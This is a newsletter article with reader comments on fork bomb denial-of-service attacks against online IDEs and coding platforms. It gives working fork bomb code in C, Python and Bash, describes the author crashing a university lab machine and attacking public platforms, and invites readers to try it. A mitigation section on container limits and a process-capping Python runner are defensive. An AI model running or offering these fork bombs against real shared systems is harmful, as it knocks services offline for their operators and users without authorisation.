Hacking Online IDEs - Fork Bombing (DoS Attack)
Ever thought about hacking an online IDE such as HackerRank, Codechef, etc.? Do you know what a Fork Bomb is? Hacking is not necessarily "extracting" information; anything that compromises the system, causes destruction and leaks can be termed hacking.
Many coding platforms as well as online IDEs have this issue where they allow us to run raw code and play with the system's resources..!!
Disclaimer: Please take care while doing this on public platforms, as they log and audit which user / IP has performed the actions. It can get you in serious trouble if you perform dangerous actions.
Most awesome coding platforms and IDEs have implemented security measures to prevent or mitigate these attacks, but still a lot of platforms can be compromised due to this.! I have checked and attacked a few myself 😜
So What Exactly is Fork Bombing?
Fork Bombing is when you spin up a process which creates infinite forks of your application on that same system. A fork is an "identical" process spun up by the main process; it has its own process ID, can live on its own and has some CPU / memory assigned to it. Keeping complications aside, it's like a new copy of our process, having the exact same code.
So, now suppose we have an infinite loop that keeps creating identical processes. Each of these processes now tries to create forks of its own, and so on and so on....
(Source of picture: Arpit Bhyani's newsletter)
So as you see, this way we create an infinite number of processes, which hog your CPU and RAM and crash the system...!
I Tried this in my University Computer Lab
Yes, true as that. Back in my college days, I just wrote a very simple Python application to bring up new forks in a while True loop and there it was. A few seconds and the whole PC got shut down (Yes, it worked after booting it up again 😂). But do take care when doing this on public applications, and more importantly, check that this doesn't affect your own systems..!!
Creating so many processes results in a resource shortage, leaving other system processes (like the one listening for keystrokes) with no CPU and RAM. So your computer freezes, no system cleanup can run, and sometimes this brings down the whole OS as well as the boot system (failure of system backups and disk writes).
How to mitigate / prevent this?
When I say this eats all the CPU and RAM of your "machine", I mean the running instance of your machine. It could be a physical computer, a virtual machine or EC2 instance, or something as small as a Docker container.
Now, if you run your production load on Kubernetes, Docker Swarm or similar container orchestration tools (Fargate, ECS, etc.), this attack can bring down only a single container. As your system would have tight upper limits on CPU and memory for each container, the orchestrator will kill the malicious container and bring up a new one (without the attack code).
Just imagine what will happen if you forget upper limits on CPU and memory in your Kubernetes cluster..! The cluster itself (or the node) will choke and there goes your business down the drain 😂
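The same kind of limit can be applied per run by whatever process launches submitted code. The following is an added example, not code from the original article: a Python runner (the name run_limited and the default values are assumptions) that sets process-count, CPU-time and address-space caps with setrlimit before exec and kills the whole process group on a wall-clock timeout. It goes beyond the CPU and memory limits named above by also capping the number of processes.

```python
import os
import resource
import signal
import subprocess
import sys


def _clamp(kind, wanted):
    """Set soft and hard limit to `wanted`, never above the inherited hard limit."""
    _, hard = resource.getrlimit(kind)
    if hard != resource.RLIM_INFINITY:
        wanted = min(wanted, hard)
    resource.setrlimit(kind, (wanted, wanted))


def run_limited(argv, max_procs=64, cpu_seconds=2,
                mem_bytes=512 * 1024 * 1024, wall_seconds=5.0):
    """Run argv (untrusted code) under resource caps; defaults are assumptions."""

    def apply_limits():
        # Runs in the child between fork() and exec(), so the caps are in
        # place before the first instruction of the submitted program.
        _clamp(resource.RLIMIT_NPROC, max_procs)  # fork() fails with EAGAIN past this
        _clamp(resource.RLIMIT_CPU, cpu_seconds)  # SIGXCPU once CPU time is used up
        _clamp(resource.RLIMIT_AS, mem_bytes)     # allocations fail past this size

    proc = subprocess.Popen(
        argv, stdin=subprocess.DEVNULL,
        stdout=subprocess.PIPE, stderr=subprocess.PIPE,
        start_new_session=True,  # own process group, so descendants can be killed too
        preexec_fn=apply_limits,
    )
    timed_out = False
    try:
        out, err = proc.communicate(timeout=wall_seconds)
    except subprocess.TimeoutExpired:
        timed_out = True
        try:
            os.killpg(proc.pid, signal.SIGKILL)  # the whole group, not just the parent
        except ProcessLookupError:
            pass                                  # group already gone
        out, err = proc.communicate()
    return {"returncode": proc.returncode, "timed_out": timed_out,
            "stdout": out.decode(errors="replace"),
            "stderr": err.decode(errors="replace")}


if __name__ == "__main__":
    # Constructed, harmless demo: the child only reports the limit it inherited.
    probe = "import resource; print(resource.getrlimit(resource.RLIMIT_NPROC))"
    print(run_limited([sys.executable, "-c", probe]))
```

RLIMIT_NPROC counts every process of the same real user ID and is not enforced for root, so each sandbox should run under its own unprivileged account. Container platforms expose the equivalent as a PID limit (for example Docker's --pids-limit).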
Let's Break the Systems..!
Let's see how we can create this attack in multiple languages..!
C Implementation
#include <unistd.h>

int main() {
    for (;;) {
        fork();
    }
}
Python implementation
import os

while True:
    os.fork()
Bash implementation
:(){ :|:& };:
Conclusion
As you see, it's so simple to bring down a system, just a few lines of code..! And coding platforms and editors are so susceptible to these..! Yes, good major ones have implemented many security measures for these, but do go ahead and try this out..! (Please read disclaimer at top before trying)
I hope you learned something new from this Newsletter. If you liked it, do subscribe, hit 👍 or ❤️, and share this with others. Stay tuned for the next one!
Payment Solution Architect | ISO20022 | SWIFT | Real Time Payments | RTGS | LVP | AWS
(2y) Interesting 😄
Sr Software Engineer@Linked[in] | I write about stuff
(2y) Interesting read
We’re hiring | Building brands | Consultant | Learner | Spiritual | Cybersecurity specialist | Husband | Son | Be happy!
(2y) We at OwnZap InfoSec can do source code vulnerability assessments to prevent such attacks. Insightful article. Thanks for sharing.